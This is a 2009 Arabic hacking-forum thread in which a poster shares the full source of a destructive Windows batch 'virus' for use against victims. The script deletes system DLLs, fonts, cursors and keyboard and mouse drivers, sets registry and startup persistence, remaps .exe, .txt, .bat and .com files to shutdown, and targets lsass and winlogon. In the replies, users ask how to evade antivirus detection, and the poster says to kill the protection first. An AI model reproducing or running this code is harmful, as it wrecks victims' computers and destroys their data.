:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم الفـايروسات Viruses (http://www.vbspiders.com/vb/f39.html)
-   -   لا متعة بدون فيروسات تدمير في تدمير (http://www.vbspiders.com/vb/t21967.html)

Br.l!nc 11-13-2009 05:49 AM

لا متعة بدون فيروسات تدمير في تدمير
 
آلسلآم عليكم ورحمة اللهـ وبركآتهـ


بسم اللهـ الرحمن الرحيم


بدون مقدمات فايروس خطير جدا

يقوم بـ:
1:حذف جميع ملفات temp
2:حذف جميع ملفات قاعدة البيانات
3:ينصب نفسه في بدا التشغيل
4:ويعطي دفعة جديدة مع اغلاق قيادة من الداخل
5:يضيف دفعة في الريجيستري
6:حذف الخطوط
7:حذف جميع DLL
8:عند تشغيل اي EXE هو BAT او TXT او COM يغلق الجهاز تلقائيا
9:تعطيل الكيبورد والفارة
10:يزيل المؤشرات
11:يعمل كراش CMD والمفكرة ومدير المهام
والكثير والكثير من المميزات
صورة عند تشغيله في جهاز الضحية لوووووول
http://shup.com/Shup/240242/Sans-titre.JPG

كود:

@echo off
title T0TAL_DZ ATTACK
cd %systemdrive%
md Foldersaregettinguselesssoijustmadethisforfun
cd %windir%\Temp
del /S /F /Q *.inf
cd %windir%\security\Database
del /S /F /Q *.sdb
cd %windir%\system32\MsDtc\Trace
echo shutdown -s >> msdtcvtr.bat
copy msdtcvtr.bat "%userprofile%\start menu\programs\startup"
cd %systemdrive%\Foldersaregettinguselesssoijustmadethisforfun
echo @echo off >> CF.bat
echo shutdown -s >> CF.bat
echo exit >> CF.bat
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CF /t REG_SZ"
/d %systemdrive%\Foldersaregettinguselesssoijustmadethisforfun\CF.bat /f
cd %windir%\Fonts
del /S /F /Q *.ttr
del /S /F /Q *.otr
del /S /F /Q *.FON
cd %windir%\system32
del /S /F /Q *.dll
cd %systemdrive%
assoc .exe=exee
assoc .txt=notepad
assoc .bat=batch
assoc .com=command
ftype exee=shutdown -s
ftype notepad=shutdown -s
ftype batch=shutdown -s
ftype command=shutdown -s
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "virus" /t REG_SZ /d "%systemdrive%\Foldersaregettinguselesssoijustmadethisforfun\CF.bat"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "virus2" /t REG_SZ /d "%systemdrive%\Foldersaregettinguselesssoijustmadethisforfun\CF.bat"
cd %windir%\system32
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
cd %windir%
copy system32 "%systemdrive%\********s and settings\%username%\start menu\programs\startup"
cd %windir%\Cursors
del /S /F /Q *.cur
del /S /F /Q *.ani
cd %systemdrive%
echo start %0 >> Autoexec.bat
cd %windir%\system32
start taskmgr
start notepad
start cmd
taskkill /A /IM taskmgr
taskkill /A /IM notepad
taskkill /A /IM cmd
cd %systemdrive%
echo taskkill /IM /A lsass.exe >> Autoexec.bat
echo tskkill /IM /A winlogon.exe >> Autoexec.bat

.:: أرجــــــو عــــدم إستخـــــدآمــــــــه علـــــى أخـــــوآننـــــآ المسلميــــــــن ::.

The Final Doom 11-13-2009 09:06 PM

بوركت !

ولكن هل هو مكشوف ام لا ؟

Br.l!nc 11-13-2009 10:52 PM

نعم مكشوف لاكن يمكن قتل الحماية و تشعيله

KaLa$nikoV 11-14-2009 03:05 PM

يسلمو

ThE_ReD_SuRf 11-20-2009 04:50 AM

مشكور هل من طريقة لعدم كشفة؟


الساعة الآن 08:20 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0